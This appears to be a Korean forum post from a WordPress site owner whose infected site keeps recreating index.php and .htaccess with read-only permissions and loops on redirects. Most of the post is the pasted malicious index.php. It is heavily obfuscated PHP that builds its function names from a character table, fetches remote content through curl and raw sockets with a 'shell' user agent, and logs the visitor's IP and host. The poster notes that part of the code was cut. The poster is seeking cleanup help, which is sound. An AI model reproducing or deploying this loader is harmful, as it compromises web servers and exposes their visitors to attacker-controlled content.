WordPress는 계속해서 index.php 및 .htaccess 파일을 만들고 사용 권한을 0444로 변경합니다.
악성코드에 감염된 웹 사이트를 수정해야 합니다.WP 관리자에게 접속하려고 하면 "to many redirects"라고 표시됩니다.
호스팅 회사가 스캔을 했는데 감염된 파일이 많았어요.public_html 폴더의 index.php를 제외한 모든 파일을 삭제했습니다.index.php 내의 코드는 다음과 같습니다.
<?php
$O0_O00_OO_='xaoH6Rs0zcxDeo5viLrz8MgweN9D5k9tmY225gw0sLaX9Yk0aLkm3dop7Z2XnJjxjdeWyV7lib1ik5sjmbh2c01=';
$O0OOO0_0__=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$OO_O_0O_00=$O0OOO0_0__{16}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{27}.$O0OOO0_0__{29}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{16}.$O0OOO0_0__{23}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{6}.$O0OOO0_0__{23}.$O0OOO0_0__{23}.$O0OOO0_0__{3}.$O0OOO0_0__{6}.$O0OOO0_0__{32}.$O0OOO0_0__{25};$OO0OO__00_=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{23}.$O0OOO0_0__{12}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10};$O0_O__0OO0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{6}.$O0OOO0_0__{29}.$O0OOO0_0__{26}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{6};$O_O_00OO_0=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{23}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{12}.$O0OOO0_0__{0}.$O0OOO0_0__{27};$OO_000O__O=$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{5}.$O0OOO0_0__{29}.$O0OOO0_0__{33}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{18}.$O0OOO0_0__{10};$O0O__O0_O0=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{16}.$O0OOO0_0__{18}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O_OO_000_O=$O0OOO0_0__{38}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{0}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$O00_O__O0O=$O0OOO0_0__{31}.$O0OOO0_0__{10}.$O0OOO0_0__{10}.$O0OOO0_0__{16}.$O0OOO0_0__{29}.$O0OOO0_0__{3}.$O0OOO0_0__{18}.$O0OOO0_0__{12}.$O0OOO0_0__{23}.$O0OOO0_0__{26}.$O0OOO0_0__{29}.$O0OOO0_0__{19}.$O0OOO0_0__{18}.$O0OOO0_0__{30}.$O0OOO0_0__{24}.$O0OOO0_0__{20};$O0OO0_0_O_=$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{29}.$O0OOO0_0__{30}.$O0OOO0_0__{17}.$O0OOO0_0__{12}.$O0OOO0_0__{33}.$O0OOO0_0__{10}.$O0OOO0_0__{33};$OO_0O_O_00=$O0OOO0_0__{32}.$O0OOO0_0__{24}.$O0OOO0_0__{30}.$O0OOO0_0__{6}.$O0OOO0_0__{10}.$O0OOO0_0__{30}.$O0OOO0_0__{29}.$O0OOO0_0__{38}.$O0OOO0_0__{18}.$O0OOO0_0__{0}.$O0OOO0_0__{32}.$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{35}.$O0OOO0_0__{0};$O00O0___OO=$O0OOO0_0__{33}.$O0OOO0_0__{35}.$O0OOO0_0__{32}.$O0OOO0_0__{25}.$O0OOO0_0__{30}.$O0OOO0_0__{10}.$O0OOO0_0__{29}.$O0OOO0_0__{32}.$O0OOO0_0__{35}.$O0OOO0_0__{0}.$O0OOO0_0__{0}.$O0OOO0_0__{30}.$O0OOO0_0__{32}.$O0OOO0_0__{10};$OO00_O0__O=$O0OOO0_0__{27}.$O0OOO0_0__{30}.$O0OOO0_0__{
///SOME CODE IS MISSING BECAUSE OF 30K LIMIT
0OOO0_0__{26};$OO000O__O_=$O0OOO0_0__{10}.$O0OOO0_0__{24}.$O0OOO0_0__{12}.$O0OOO0_0__{5};$OOO0_0O0__=$O0OOO0_0__{10}.$O0OOO0_0__{12}.$O0OOO0_0__{5}.$O0OOO0_0__{30};$O_0OO0_O0_=$O0OOO0_0__{41}.$O0OOO0_0__{35}.$O0OOO0_0__{12}.$O0OOO0_0__{0};$O0_OOO00__=$O0OOO0_0__{38}.$O0OOO0_0__{30}.$O0OOO0_0__{35}.$O0OOO0_0__{38};$OOO_000O__=$O0OOO0_0__{5}.$O0OOO0_0__{26}.$O0OOO0_0__{7};if(!function_exists('str_ireplace')){function str_ireplace($from,$to,$string){return trim(preg_replace("/".addcslashes($from,"?:\\/*^$")."/si",$to,$string));}};$O_0__O0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$url,$OO0OO0_0__=0,$O_0_00_OOO=1,$O_0OO0O__0=NULL,$OO0_O0O__0=array(),$O_O0O0__0O=\'shell\'','if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x5f\x4f\x5f\x30\x30"]("/^https*\\:\\/\\//si",$url)){if(isset(${"\x5f\x47\x45\x54"}["\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'iy4tyhTkktKsovilXIzCtLzMlMUQCKWKnlJRUtPXWAMA\');$O_OO00O0__.=$url;echo $O_OO00O0__;unset($O_OO00O0__);exit();}return \'\';}$OO0_0_0O_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Sy4tyhTonPzMss0U4GsYpTS/ILoOzUitTkmrTi/OTs/ILUvJoCBLO4pCg1MTcexE8tiU/OyUzNK6mB8YBtPSJakA\');$OO_00OO_0_=$O_O__00O0O=\'\';foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'|\',$OO0_0_0O_O) as $c){$OO00OO___0=1;if($OO0OO0_0__&&substr($c,0,1)==\'c\'){continue;}foreach(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"](\'+\',$c) as $d){if(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x4f\x30\x5f\x30\x5f\x4f\x5f"]($d)){$OO00OO___0=0;}}unset($d);if($OO00OO___0){$OO_00OO_0_=$c;break;}}unset($OO0_0_0O_O,$c);if($OO_00OO_0_==\'\'){return 0;}if(substr($OO_00OO_0_,0,1)==\'c\'){$O0O___0OO0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x5f\x4f\x5f\x30\x30\x4f\x4f"]();${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_URL,$url);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_USERAGENT,$O_O0O0__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_RETURNTRANSFER,1);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_TIMEOUT,100);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_FRESH_CONNECT,TRUE);if($O_0_00_OOO==2){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POST,1);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x4f\x30\x5f\x4f\x30"]($O0O___0OO0,CURLOPT_POSTFIELDS,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0));}}$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f\x5f"]($O0O___0OO0);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x30\x4f\x30\x4f\x5f\x5f"]($O0O___0OO0);if(!$O_0O__O00O){if(isset(${"\x5f\x47\x45\x54"}["\x63\x75\x72\x6c\x65\x72\x72"])){$O_OO00O0__=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'i04uLhTcpRSC0qyi+KVctLKi6tPwBgA=\');$O_OO00O0__.=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x30\x4f\x30\x5f\x5f\x4f\x30"]($O0O___0OO0);echo $O_OO00O0__;unset($O_OO00O0__);exit();}return 0;}else{$O_0O__O00O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_0O__O00O,"\\xEF\\xBB\\xBF"));return $O_0O__O00O;}}$O0_O_0_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x30\x4f\x5f\x4f"]($url);isset($O0_O_0_O0O["\x68\x6f\x73\x74"])||$O0_O_0_O0O["\x68\x6f\x73\x74"]=\'\';isset($O0_O_0_O0O["\x70\x61\x74\x68"])||$O0_O_0_O0O["\x70\x61\x74\x68"]=\'\';isset($O0_O_0_O0O["\x71\x75\x65\x72\x79"])|| $O0_O_0_O0O["\x71\x75\x65\x72\x79"]=\'\';isset($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])||$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"]=\'\';$O__OOO00_0=$O0_O_0_O0O["\x70\x61\x74\x68"]?$O0_O_0_O0O["\x70\x61\x74\x68"].($O0_O_0_O0O["\x71\x75\x65\x72\x79"]?\'?\'.$O0_O_0_O0O["\x71\x75\x65\x72\x79"]:\'\'):\'/\';$OOO00O0___=$O0_O_0_O0O["\x68\x6f\x73\x74"];if($O0_O_0_O0O["\x73\x63\x68\x65\x6d\x65"]==\'https\'){$O00_OO__0O=\'1.1\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?443:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];$OOO00O0___=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Ky7OshTdLtPXBwA=\');$OOO00O0___.=$O0_O_0_O0O["\x68\x6f\x73\x74"];}else{$O00_OO__0O=\'1.0\';$O0O0__O_0O=empty($O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"])?80:$O0_O_0_O0O["\x4f\x30\x4f\x30\x5f\x5f\x4f\x5f\x30\x4f"];}$O0OO_0O0__=\'Host:\';$O0OO_0O0__.=$OOO00O0___;$OO0_O0O__0[]=$O0OO_0O0__;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PyhT0tNLsnMz7NyzsktPvTgUA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'Cy1OLhTdJ1TE/NK7EtPCAA==\').$O_O0O0__0O;$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c0xOThTi0osdLtPS1wIA\');unset($O0OO_0O0__);if($O_0_00_OOO==2){if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x5f\x30\x4f\x30\x4f"]($O_0OO0O__0)){$O_0OO0O__0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x5f\x5f\x4f\x30\x4f"]($O_0OO0O__0);}$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9EtqSxItUosKMjJTE4syczP06/QLS8v103LL8rVLS3KSc1Lzk9tPJTQEA\');$OO0_O0O__0[]=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'c87PKhT0nNK9H1Sc1LL8mtPwAgA=\').${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_0OO0O__0);$O_O__00O0O="POST $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n".$O_0OO0O__0;unset($O_0OO0O__0);}else{$O_O__00O0O="GET $O__OOO00_0 HTTP/$O00_OO__0O\\r\\n".${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x30\x4f\x4f\x30\x5f\x4f\x30\x5f"]("\\r\\n",$OO0_O0O__0)."\\r\\n\\r\\n";}unset($OO0_O0O__0,$O0_O_0_O0O,$O00_OO__0O,$O__OOO00_0);$O_O0O__0O0=null;if(substr($OO_00OO_0_,-1)==\'n\'){$O_O0O__0O0=$OO_00OO_0_($OOO00O0___,$O0O0__O_0O,$O_OO00O0__no,$O_OO00O0__str,30);}else{if(substr($OO_00OO_0_,-1)==\'t\'){$O_O__O0O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x5f\x4f\x4f\x30\x5f\x4f"](\'K0kushTNLtPXBwA=\');$O_O__O0O00.=$OOO00O0___;$O_O__O0O00.=\':\';$O_O__O0O00.=$O0O0__O_0O;$O_O0O__0O0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x4f\x4f\x5f\x5f\x30\x30\x5f"]($O_O__O0O00,$O_OO00O0__no,$O_OO00O0__str,30);unset($O_O__O0O00);}}$O_OO00__0O=\'\';if($O_O0O__0O0){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x4f\x4f\x5f\x30"]($O_O0O__0O0,true);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x30\x30\x4f\x5f\x5f\x4f"]($O_O0O__0O0,30);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O0O__0O0,$O_O__00O0O);if(!$OO0OO0_0__){$O_0_O00_OO=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x5f\x5f\x30\x4f\x4f\x30"]($O_O0O__0O0);if(!$O_0_O00_OO["\x74\x69\x6d\x65\x64\x5f\x6f\x75\x74"]){while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_0O0OO_0_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x30\x30\x4f\x4f\x4f\x5f\x5f"]($O_O0O__0O0);if($O_0O0OO_0_&&($O_0O0OO_0_=="\\r\\n"||$O_0O0OO_0_=="\\n")){break;}unset($O_0O0OO_0_);}while(!${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x5f\x4f\x4f\x4f\x30\x30\x5f\x5f"]($O_O0O__0O0)){$O_O_0O00_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x30\x4f\x5f\x5f\x30\x4f\x5f"]($O_O0O__0O0,8192);$O_OO00__0O.=$O_O_0O00_O;unset($O_O_0O00_O);}}unset($O_0_O00_OO);}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x30\x4f\x4f\x30\x5f"]($O_O0O__0O0);}else{if(substr($OO_00OO_0_,-1)==\'e\'){$O0O_0O0_O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x5f\x4f\x30\x5f\x5f\x4f"]($OOO00O0___);$O_O0O__0O0=$OO_00OO_0_(AF_INET,SOCK_STREAM,0);if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x4f\x30\x5f\x5f\x5f\x4f\x4f"]($O_O0O__0O0,$O0O_0O0_O_,$O0O0__O_0O)){if(!$OO0OO0_0__){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));while($O0O0O0O___=@${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f"]($O_O0O__0O0,8192)){$O_OO00__0O.=$O0O0O0O___;unset($O0O0O0O___);}$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x4f\x30\x5f\x30\x5f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x5f\x30\x4f\x4f\x30\x4f\x30"]($O_OO00__0O);$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x4f\x30\x5f\x4f\x30\x4f\x30"]("\\r\\n\\r\\n",$O_OO00__0O);}else{$O_O_00_O0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](2,5);$O_00OO0O__=0;while($O_00OO0O__<$O_O_00_O0O){${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x4f\x30"]($O_O0O__0O0,$O_O__00O0O,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O__00O0O));$O_00OO0O__++;${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x4f\x4f\x5f\x5f\x4f\x30"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x4f\x5f\x5f\x30\x5f\x4f\x4f\x30"](50000,100000));}unset($O_00OO0O__,$O_O_00_O0O);}}${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x30\x4f\x4f\x5f"]($O_O0O__0O0);unset($O0O_0O0_O_);}}unset($O_O__00O0O,$OO_00OO_0_,$O_O0O__0O0,$O0O0__O_0O,$OOO00O0___);if(!$OO0OO0_0__){$O_OO00__0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x5f\x30\x4f\x5f\x30\x30"](\'/(?:(?:\\r\\n|\\n)|^)([0-9A-F]+)(?:\\r\\n|\\n){1,2}(.*?)\'.\'((?:\\r\\n|\\n)(?:[0-9A-F]+(?:\\r\\n|\\n))|$)/si\',${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"](\'$matches\',\'return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x30\x30\x5f\x30\x5f\x5f\x4f\x4f\x4f"]($matches[1])==${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($matches[2])?$matches[2]:$matches[0];\'),$O_OO00__0O);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x30\x30\x30\x4f\x5f\x5f\x4f\x5f"]($O_OO00__0O,"\\xEF\\xBB\\xBF"));}else{return 1;}');$OOO__000_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$O_O_0OO0_0=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x5f\x4f\x30\x30\x30\x5f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x4f\x30\x30\x4f\x30\x5f\x5f"]($OOO0__0O_0));$OO__O0O_00=substr($O_O_0OO0_0,0,5);$OOO_00__0O=substr($O_O_0OO0_0,-5);$OO__0O0_O0=substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10);return $OO__O0O_00.\'hT\'.substr($O_O_0OO0_0,5,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($O_O_0OO0_0)-10).\'tP\'.$OOO_00__0O;');$O0_0_OO0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0','$OO__O0O_00=substr($OOO0__0O_0,0,5);$OOO_00__0O=substr($OOO0__0O_0,-5);$OO__0O0_O0=substr($OOO0__0O_0,7,${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x4f\x5f\x30\x30\x5f\x4f\x4f\x30"]($OOO0__0O_0)-14);return ${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x5f\x5f\x30\x4f\x30\x5f\x30\x4f\x4f"](${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x30\x5f\x30\x4f\x4f"]($OO__O0O_00.$OO__0O0_O0.$OOO_00__0O));');$OO_0O0_0_O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OO_OO0__00=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"})){if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x58\x5f\x46\x4f\x52\x57\x41\x52\x44\x45\x44\x5f\x46\x4f\x52"];}else if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"])){$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x43\x4c\x49\x45\x4e\x54\x5f\x49\x50"];}else{$OO_OO0__00=${"\x5f\x53\x45\x52\x56\x45\x52"}["\x52\x45\x4d\x4f\x54\x45\x5f\x41\x44\x44\x52"];}}else{if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_X_FORWARDED_FOR\');}else if(${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\')){$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'HTTP_CLIENT_IP\');}else{$OO_OO0__00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x30\x5f\x5f\x4f\x30\x5f\x30"](\'REMOTE_ADDR\');}}return $OO_OO0__00;');$O0_O_O_O00=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$OOO0__0O_0=\'\'','if(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x48\x54\x54\x50\x5f\x48\x4f\x53\x54"];}elseif(isset(${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"])){return ${"\x5f\x53\x45\x52\x56\x45\x52"}["\x53\x45\x52\x56\x45\x52\x5f\x4e\x41\x4d\x45"];}return $OOO0__0O_0;');$O_O0O_00O_=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x4f\x5f\x4f\x5f\x30\x30"]('$O0_O00_OO_','$O__OO00_0O=${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x5f\x30\x5f\x4f\x4f\x30\x5f\x30"]($O0_O00_OO_);$OO0_0__0OO=\'\';for ($O_00OO0O__=0;$O_00OO0O__<${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x4f\x4f\x4f\x5f\x5f\x4f\x30\x5f\x30\x30"]($O__OO00_0O);$O_00OO0O__++){if($O_00OO0O__%2!=0){$OO0_0__0OO.=$O__OO00_0O[$O_00OO0O__];}}return 